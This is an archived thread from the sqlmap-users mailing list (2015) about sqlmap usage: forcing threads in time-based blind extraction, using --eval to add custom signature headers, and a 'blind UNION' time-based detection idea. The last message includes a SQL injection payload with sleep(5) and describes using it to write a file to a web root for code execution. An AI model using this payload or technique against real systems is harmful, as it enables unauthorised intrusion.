I'll make hidden switch and let you know. Bye On Sep 25, 2015 9:07 PM, "Tobias Glemser" <tgl...@se...> wrote: > Hi Miroslav, > > thanks for your fast reply (as always). > > > I majority of cases you'll get totally wrong results. > In the past it worked quite nice with lots of targets. > > > Also, you are risking to DoS > > the server (especially in case of OR time-based and heavy queries). > Right. > > > There is no force option nor there will be. > Alright, I'll move to my /lib/techniques/blind/inference.py :) > > Cheers > > Tobias > > > > -----Ursprüngliche Nachricht----- > > Von: Miroslav Stampar [mailto:mir...@gm...] > > Gesendet: Freitag, 25. September 2015 19:17 > > An: Tobias Glemser > > Cc: SqlMap List > > Betreff: Re: [sqlmap-users] Force thread even if time based blind? [ Z1 > > UNGESICHERT ] > > > > I majority of cases you'll get totally wrong results. Also, you are > > risking to DoS > > the server (especially in case of OR time-based and heavy queries). There > > is > > no force option nor there will be. > > > > Bye > > > > On Sep 25, 2015 7:14 PM, "Tobias Glemser" <tgl...@se...> wrote: > > > > > > Hi List, > > > > does anybobdy know a way to disable the "multi-threading is > > considered > > unsafe in time-based data retrieval. Going to switch it off > > automatically" > > thing? I don't care about some wrong characters, I need speed :) So > > maybe > > there is a "force" option I missed. Thanks in advance. > > > > Tobias > > > > > ------------------------------------------------------------------------------ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > |
From: Tobias G. <tgl...@se...> - 2015-09-25 19:07:42
|
Hi Miroslav, thanks for your fast reply (as always). > I majority of cases you'll get totally wrong results. In the past it worked quite nice with lots of targets. > Also, you are risking to DoS > the server (especially in case of OR time-based and heavy queries). Right. > There is no force option nor there will be. Alright, I'll move to my /lib/techniques/blind/inference.py :) Cheers Tobias > -----Ursprüngliche Nachricht----- > Von: Miroslav Stampar [mailto:mir...@gm...] > Gesendet: Freitag, 25. September 2015 19:17 > An: Tobias Glemser > Cc: SqlMap List > Betreff: Re: [sqlmap-users] Force thread even if time based blind? [ Z1 > UNGESICHERT ] > > I majority of cases you'll get totally wrong results. Also, you are > risking to DoS > the server (especially in case of OR time-based and heavy queries). There > is > no force option nor there will be. > > Bye > > On Sep 25, 2015 7:14 PM, "Tobias Glemser" <tgl...@se...> wrote: > > > Hi List, > > does anybobdy know a way to disable the "multi-threading is > considered > unsafe in time-based data retrieval. Going to switch it off > automatically" > thing? I don't care about some wrong characters, I need speed :) So > maybe > there is a "force" option I missed. Thanks in advance. > > Tobias > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Miroslav S. <mir...@gm...> - 2015-09-25 17:17:00
|
I majority of cases you'll get totally wrong results. Also, you are risking to DoS the server (especially in case of OR time-based and heavy queries). There is no force option nor there will be. Bye On Sep 25, 2015 7:14 PM, "Tobias Glemser" <tgl...@se...> wrote: > Hi List, > > does anybobdy know a way to disable the "multi-threading is considered > unsafe in time-based data retrieval. Going to switch it off automatically" > thing? I don't care about some wrong characters, I need speed :) So maybe > there is a "force" option I missed. Thanks in advance. > > Tobias > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Brandon P. <bpe...@gm...> - 2015-09-25 17:16:19
|
There is not as far as I know, but there is no reason why you can't open up multiple instances of sqlmap dumping specifics parts of the database you want. On Fri, Sep 25, 2015 at 12:01 PM, Tobias Glemser <tgl...@se...> wrote: > Hi List, > > does anybobdy know a way to disable the "multi-threading is considered > unsafe in time-based data retrieval. Going to switch it off automatically" > thing? I don't care about some wrong characters, I need speed :) So maybe > there is a "force" option I missed. Thanks in advance. > > Tobias > > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
From: Tobias G. <tgl...@se...> - 2015-09-25 17:14:03
|
Hi List, does anybobdy know a way to disable the "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" thing? I don't care about some wrong characters, I need speed :) So maybe there is a "force" option I missed. Thanks in advance. Tobias |
From: Vincent M. <vi...@ma...> - 2015-09-18 10:59:02
|
Thanks ! This is working. I am able to insert a hash value from differents elements in each request. for the record, I you want to compute a hash compute from an url and the content of your post : s1 = hashlib.sha1() s1.update( "".join([ _locals['uri'], _locals['post'] ]).encode()) signature = "$1$" + s1.hexdigest() And then insert this signature in the request : _locals['auxHeaders'][« X-Custom-Signature"] = signature Pro tips: if for some reason, the « :443 » added at the end a the fqdn bother you , you can delete it : _locals['uri'] = _locals['uri'].replace(":443", "") Regards, Vincent. > Le 17 sept. 2015 à 15:36, Miroslav Stampar <mir...@gm...> a écrit : > > First, please update to the latest revision. > > - now you have a variable "_locals" as a copy of query locals() inside the --eval. In most cases you'll be able to just read it (e.g. changes to string objects won't be reflected) > - inside of it there is an entry "method" which if its set to None or "GET" you are dealing with the GET request, otherwise the method will be set to something concrete. Take a look at: http://pastebin.com/Vbit2RDt > - also, there is an entry "auxHeaders" where you can put a custom header value inside of --eval. Take a look at: http://pastebin.com/8qd9gG0J > > Bye > > p.s. this is a "hack", just to help users in this kind of cases. Please don't expect anything more to be implemented as I am pretty sure that this is currently more than enough for your case > > On Thu, Sep 17, 2015 at 11:29 AM, Vincent Malguy <vi...@ma...> wrote: > I think so but how can I access and modify headers in a —eval ? > > ./sqlmap.py -u "http://www.google.com/?id=1" --eval="print(uri) ; print(method); print(headers); print(body); » > [11:24:12] [INFO] testing connection to the target URL > http://www.google.com:80/ <- uri is good ! > [11:24:12] [CRITICAL] an error occurred while evaluating provided code ('name 'method' is not defined’) > > headers and body can be accessed neither ? > > Regards, Vincent > > > > Le 16 sept. 2015 à 20:43, Brandon Perry <bpe...@gm...> a écrit : > > > > Could you use --eval for this instead? > > > > On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> wrote: > > Hi, > > > > I am new to tamper scripts and I have to forge some custom headers to pass a API authentication. > > I need to get the http METHOD (get, post …) use by the next sqlmap resquest and the exact URL that will be use . > > > > For exemple , in this header : > > [17:06:22] [TRAFFIC OUT] HTTP request [#35]: > > GET /1.0/iot/app/SQLIHERE HTTP/1.1 > > Accept-language: en-us,en;q=0.5 > > Accept-encoding: identity > > Pragma: no-cache > > Cache-control: no-cache,no-store > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > > User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org) > > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > > > > > > I want to be able to get the first line : GET /1.0/iot/app/SQLIHERE > > From this line , I would be able to parse for the METHOD and get the URI that I will *statically* concat with the base URL of the API. > > > > So far I have managed to compute the auth header and use sqlmap to test the API but I have to update my tamper script for each different endpoint (URI). > > > > Thanks for your help. > > > > > > > > > > ------------------------------------------------------------------------------ > > Monitor Your Dynamic Infrastructure at Any Scale With Datadog! > > Get real-time metrics from all of your servers, apps and tools > > in one place. > > SourceForge users - Click here to start your Free Trial of Datadog now! > > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140 > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > -- > > http://volatile-minds.blogspot.com -- blog > > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Monitor Your Dynamic Infrastructure at Any Scale With Datadog! > Get real-time metrics from all of your servers, apps and tools > in one place. > SourceForge users - Click here to start your Free Trial of Datadog now! > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2015-09-17 13:37:02
|
First, please update to the latest revision. - now you have a variable "_locals" as a copy of query locals() inside the --eval. In most cases you'll be able to just read it (e.g. changes to string objects won't be reflected) - inside of it there is an entry "method" which if its set to None or "GET" you are dealing with the GET request, otherwise the method will be set to something concrete. Take a look at: http://pastebin.com/Vbit2RDt - also, there is an entry "auxHeaders" where you can put a custom header value inside of --eval. Take a look at: http://pastebin.com/8qd9gG0J Bye p.s. this is a "hack", just to help users in this kind of cases. Please don't expect anything more to be implemented as I am pretty sure that this is currently more than enough for your case On Thu, Sep 17, 2015 at 11:29 AM, Vincent Malguy <vi...@ma...> wrote: > I think so but how can I access and modify headers in a —eval ? > > ./sqlmap.py -u "http://www.google.com/?id=1" --eval="print(uri) ; > print(method); print(headers); print(body); » > [11:24:12] [INFO] testing connection to the target URL > http://www.google.com:80/ <- uri is good ! > [11:24:12] [CRITICAL] an error occurred while evaluating provided code > ('name 'method' is not defined’) > > headers and body can be accessed neither ? > > Regards, Vincent > > > > Le 16 sept. 2015 à 20:43, Brandon Perry <bpe...@gm...> a > écrit : > > > > Could you use --eval for this instead? > > > > On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> > wrote: > > Hi, > > > > I am new to tamper scripts and I have to forge some custom headers to > pass a API authentication. > > I need to get the http METHOD (get, post …) use by the next sqlmap > resquest and the exact URL that will be use . > > > > For exemple , in this header : > > [17:06:22] [TRAFFIC OUT] HTTP request [#35]: > > GET /1.0/iot/app/SQLIHERE HTTP/1.1 > > Accept-language: en-us,en;q=0.5 > > Accept-encoding: identity > > Pragma: no-cache > > Cache-control: no-cache,no-store > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > > User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org) > > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > > > > > > I want to be able to get the first line : GET /1.0/iot/app/SQLIHERE > > From this line , I would be able to parse for the METHOD and get the URI > that I will *statically* concat with the base URL of the API. > > > > So far I have managed to compute the auth header and use sqlmap to test > the API but I have to update my tamper script for each different endpoint > (URI). > > > > Thanks for your help. > > > > > > > > > > > ------------------------------------------------------------------------------ > > Monitor Your Dynamic Infrastructure at Any Scale With Datadog! > > Get real-time metrics from all of your servers, apps and tools > > in one place. > > SourceForge users - Click here to start your Free Trial of Datadog now! > > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140 > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > -- > > http://volatile-minds.blogspot.com -- blog > > http://www.volatileminds.net -- website > > > > ------------------------------------------------------------------------------ > Monitor Your Dynamic Infrastructure at Any Scale With Datadog! > Get real-time metrics from all of your servers, apps and tools > in one place. > SourceForge users - Click here to start your Free Trial of Datadog now! > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Vincent M. <vi...@ma...> - 2015-09-17 09:29:24
|
I think so but how can I access and modify headers in a —eval ? ./sqlmap.py -u "http://www.google.com/?id=1" --eval="print(uri) ; print(method); print(headers); print(body); » [11:24:12] [INFO] testing connection to the target URL http://www.google.com:80/ <- uri is good ! [11:24:12] [CRITICAL] an error occurred while evaluating provided code ('name 'method' is not defined’) headers and body can be accessed neither ? Regards, Vincent > Le 16 sept. 2015 à 20:43, Brandon Perry <bpe...@gm...> a écrit : > > Could you use --eval for this instead? > > On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> wrote: > Hi, > > I am new to tamper scripts and I have to forge some custom headers to pass a API authentication. > I need to get the http METHOD (get, post …) use by the next sqlmap resquest and the exact URL that will be use . > > For exemple , in this header : > [17:06:22] [TRAFFIC OUT] HTTP request [#35]: > GET /1.0/iot/app/SQLIHERE HTTP/1.1 > Accept-language: en-us,en;q=0.5 > Accept-encoding: identity > Pragma: no-cache > Cache-control: no-cache,no-store > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org) > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > > > I want to be able to get the first line : GET /1.0/iot/app/SQLIHERE > From this line , I would be able to parse for the METHOD and get the URI that I will *statically* concat with the base URL of the API. > > So far I have managed to compute the auth header and use sqlmap to test the API but I have to update my tamper script for each different endpoint (URI). > > Thanks for your help. > > > > > ------------------------------------------------------------------------------ > Monitor Your Dynamic Infrastructure at Any Scale With Datadog! > Get real-time metrics from all of your servers, apps and tools > in one place. > SourceForge users - Click here to start your Free Trial of Datadog now! > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website |
From: Brandon P. <bpe...@gm...> - 2015-09-16 18:44:06
|
Could you use --eval for this instead? On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> wrote: > Hi, > > I am new to tamper scripts and I have to forge some custom headers to pass > a API authentication. > I need to get the http METHOD (get, post …) use by the next sqlmap > resquest and the exact URL that will be use . > > For exemple , in this header : > [17:06:22] [TRAFFIC OUT] HTTP request [#35]: > GET /1.0/iot/app/SQLIHERE HTTP/1.1 > Accept-language: en-us,en;q=0.5 > Accept-encoding: identity > Pragma: no-cache > Cache-control: no-cache,no-store > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org) > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > > > I want to be able to get the first line : GET /1.0/iot/app/SQLIHERE > From this line , I would be able to parse for the METHOD and get the URI > that I will *statically* concat with the base URL of the API. > > So far I have managed to compute the auth header and use sqlmap to test > the API but I have to update my tamper script for each different endpoint > (URI). > > Thanks for your help. > > > > > > ------------------------------------------------------------------------------ > Monitor Your Dynamic Infrastructure at Any Scale With Datadog! > Get real-time metrics from all of your servers, apps and tools > in one place. > SourceForge users - Click here to start your Free Trial of Datadog now! > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
From: Vincent M. <vi...@ma...> - 2015-09-16 15:23:58
|
Hi, I am new to tamper scripts and I have to forge some custom headers to pass a API authentication. I need to get the http METHOD (get, post …) use by the next sqlmap resquest and the exact URL that will be use . For exemple , in this header : [17:06:22] [TRAFFIC OUT] HTTP request [#35]: GET /1.0/iot/app/SQLIHERE HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: identity Pragma: no-cache Cache-control: no-cache,no-store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 I want to be able to get the first line : GET /1.0/iot/app/SQLIHERE From this line , I would be able to parse for the METHOD and get the URI that I will *statically* concat with the base URL of the API. So far I have managed to compute the auth header and use sqlmap to test the API but I have to update my tamper script for each different endpoint (URI). Thanks for your help. |
From: Brandon P. <bpe...@gm...> - 2015-09-15 13:46:45
|
On Tue, Sep 15, 2015 at 6:54 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > A) As I see this "hybrid", you are proposing it as a way to do the "UNION" > based file write (INTO DUMPFILE). > > B) Incorporating this "hybrid" technique into the standard tests would be > uberkill (from my perspective). I have a feeling that at least the > "time-based" injection would be detected in this kind of cases, so making > the "UNION" tests carrying the SLEEP would just detect the same thing (but > with usage of UNION technique), but with more requests. > You are correct, the other time base payloads were detected correctly. > > So, to go back to the A). sqlmap already tries to use the "INTO OUTFILE > ... LINES TERMINATED" in non-UNION cases. Making post-detection tests for > number of columns is doable in the "file-write" phase, but I am not > convinced that it would do more good than the number of requests required > (as ORDER BY is expected to be unusable, we would need to pick the number > of columns incrementally). > I didn't realise sqlmap would try this, I thought it required a UNION-based detection before trying. I can play around with this. > > Thoughts? > > Kind regards > > On Fri, Sep 11, 2015 at 8:43 PM, Brandon Perry <bpe...@gm...> > wrote: > >> I have had this idea for a while, and I finally came across an injection >> that this was useful for me. >> >> Due to logic in the application, a generic UNION tacked on the end of the >> query doesn't work. >> >> However, a payload of: >> >> blah=foo"+union+select+null,null,null,null,sleep(5)--%20 >> >> does result in a response coming back 5 seconds later than the baseline. >> Removing or adding a column to the union results in the baseline request >> time. >> >> This was very useful for me, because I was able to use this 'blind union' >> in order to write a file to the web root and achieve RCE, even though the >> union in and of itself would not let me pull data out en mass (the other >> time based payloads did work as well). >> >> This might be a useful check for sqlmap to implement. Currently, there >> are heuristics that sqlmap has to determine whether an injection point is >> union-able, but not exploitable with generic NULL/union char payloads. I >> think this is determined by the HTTP response data though, not the temporal >> aspect of the HTTP response. >> >> Thoughts? >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |